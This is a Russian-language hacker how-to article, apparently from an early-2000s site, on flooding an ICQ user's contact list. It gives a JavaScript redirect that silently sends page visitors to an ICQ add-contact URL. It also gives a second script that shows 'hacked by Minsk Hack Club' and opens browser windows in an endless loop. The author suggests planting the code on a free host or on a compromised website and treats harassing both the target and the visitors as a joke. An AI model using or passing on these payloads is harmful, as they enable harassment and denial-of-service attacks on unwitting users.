Всем довольно хорошо известна программа ICQ фирмы
Mirabilis. Это очень популярная программа и этим в основном объясняется то, что
она подвергается всевозможным атакам. Я расскажу про практически неизвестный
способ атаки на неё. Так называемы Contact List flood. Всем известна такая форма
атаки, как Message flood, основанная на большом количестве сообщения посылаемых
на один UIN, отчего программа зависает и закрывается. Но существует другой
способ, не меннее прикольный. Он основан на большом добавлении народа в Contact
list, представьте: сидите вы в режиме Invisble, а к вам народ ломится и ломится
=). Но сделать это проблематично, если вы собираетесь просить людей добавить
чей-то UIN в свой контакт лист. Но сама ICQ решает эту проблему. На сайте
www.icq.com (зеркало: www.mirabilis.com) кроме информации о самой ICQ существует
много скриптов, помогающих решить различные проблемы, возникающие при
использовании ICQ, одним из них является
http://wwp.icq.com/scripts/search.dll?to=someUIN
Если вы введете этот адрес в
ваш броузер, то человек с тем UINом, который вы запросили, добавится в ваш
Contact List. Если у вас даже не запущена программа ICQ, то она запустится, и
выше описанные действия повторятся. Теперь возникает другой вопрос, как
заставить людей ходить по выше указанному адресу ? Эта проблема решаема, если
использовать Java-scripts.
<SCRIPT
LANGUAGE="Javascript">
parent.location="http://wwp.icq.com/scripts/search.dll?to=someUIN";
</SCRIPT>
Разместите этот код на
странице, и человек, который зайдет на неё, автоматически перейдет на тот адрес,
что нам нужен, и добавит чей-то UIN к себе в ICQ. Вот казалось бы и всё,
регистрируемся где-нить на narod.ru, вставляем этот Javascript в index.html и
начинаем рекламировать страницу (или другой вариант, повесить на хорошо
посещаемом сайте, который вы взломали). Но этот прикол можно усугубить еще
больше. (почему должен только страдать владелец UINa, который вы floodите, нада
еще и того, кто к нему добавляется =)
<SCRIPT
LANGUAGE=JScript>
{
window.alert("hacked by Minsk Hack Club");
while(1)window.open("http://wwp.icq.com/scripts/search.dll?to=someUIN");
}
</SCRIPT>
Размещаете этот код в index.htm и тот, кто зашел на страницу с этим javascriptом
с помощью Internet Explorer "улетает". Начинают открываться бесконечные окна
Internet Explorera. Вот пожалуй и все.
|
Главная
Каталог файлов
